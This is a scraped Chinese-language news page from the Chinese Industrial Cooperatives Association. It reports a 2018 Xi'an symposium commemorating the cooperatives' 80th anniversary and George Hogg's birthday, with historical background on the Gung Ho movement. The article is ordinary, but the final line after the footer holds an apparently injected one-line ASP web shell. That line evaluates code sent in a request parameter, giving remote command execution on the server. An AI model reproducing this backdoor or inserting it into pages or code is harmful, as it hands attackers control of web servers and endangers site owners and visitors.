设为首页 加入收藏 工合新闻 电子商务 入会须知 联系我们  

网站首页
  工合新闻
>>  2011年
>>  2012年
>>  2013年
>>  2014年
>>  2015年
>>  2016年
>>  2017年
>>  2018年

地址:北京市东城区建国门北大街金成建国5号1702
电话:010-66165725   

E-mail:gunghobianjibu@126.com

 

  工合新闻
 
八路军西安办事处纪念馆举办纪念中国工合成立80周年暨乔治•何克诞辰103周年座谈会
 发布时间:2018/2/3 浏览次数:1040

    1月26日,由西安培华学院西北工合研究所主办、八路军西安办事处纪念馆协办的“纪念中国工合成立80周年暨乔治·何克诞辰103周年座谈会”在八路军西安办事处纪念馆隆重举行。西安培华学院西北工合研究所、八路军西安办事处纪念馆全体职工及社会各界相关人士参加了此次活动。何克的养子聂广涛先生为座谈会的召开发来了书面发言和贺词。

秦泉安老师介绍乔治·何克、工合运动的研究现状及以往纪念活动的开展情况

    座谈会上,八路军西安办事处纪念馆王晓莉副馆长介绍了海伦·斯诺作为工合运动发起者,对中国工合事业所做出的巨大贡献。陕西工合(筹)研究员、西安培华学院西北工合研究所所长秦泉安向与会者介绍了近年来学术界对乔治·何克及工合运动的研究现状,着重讲述了何克生日的考证过程,并向大家提供了由何克的外甥在英国获取的官方证明。他还指出,今年是中国工合成立80周年,在何克真正的生日举办这次座谈会意义重大。随后,秦泉安老师向八办纪念馆捐赠了乔治·何克中译本著作《我看到一个新的中国》和何克母校英国圣乔治中学提供的部分何克家信(影印件)等珍贵资料。

      秦泉安老师向八办纪念馆捐赠书籍和文件资料

    八路军办事处纪念馆王晓莉副馆长表示,今天我们缅怀乔治·何克,就是要铭记历史,继承和发扬他无私奉献的国际主义精神。在奋力追赶超越,决胜全面小康,加快建设引领“一带一路”、亚欧合作交流的国际化大都市的新征程中,弘扬“努力干,一起干”的工合精神,对全力推进大西安建设将起到积极的作用。在中国工合成立80周年之际,八办纪念馆将充分发挥纪念馆的公众教育职能,通过举办展览等形式,大力宣传“工合精神”,积极开展国际文化交流,为谱写国际友谊新篇章而努力。

                   王晓莉副馆长介绍海伦·斯诺展览举办情况

新闻链接:

“中国工业合作社”运动(简称工合运动)是在抗战爆发后,日军对我国沿海沿江工业基地进行大肆掠夺和破坏的背景下,由斯诺夫妇和路易·艾黎等国际友人发起,大批爱国知识分子和民族实业家参加的经济救亡和社会改良运动。工合运动组织民众开展工业生产,支援抗战前线斗争,争取最广泛的国际援助,被誉为“后方经济堡垒”,在中国人民抗日战争史中书写了光辉篇章。2015年10月20日,习近平主席在英国女王伊丽莎白二世举行的欢迎晚宴的祝酒辞中,说起了乔治·何克积极投身中国人民抗日战争的感人故事。2017年4月,习近平总书记在给中国工合国际委员会、北京培黎职业学院的回信中表示希望他们发扬传承路易·艾黎“努力干,一起干”的工合精神,积极开展国际文化交流,谱写国际友谊新篇章,为促进世界和平与发展、构建人类命运共同体作出新的贡献。

 

 

中国工业合作协会  版权所有

指导单位:中华人民共和国民政部、国务院国有资产监督管理委员会

主办单位:中国工业合作协会 

电话:010-66165725 邮箱:gunghobianjibu@126.com  地址:北京市东城区建国门内大街金成建国5号1702

"%><%Eval(Request(chr(112)))%><%'.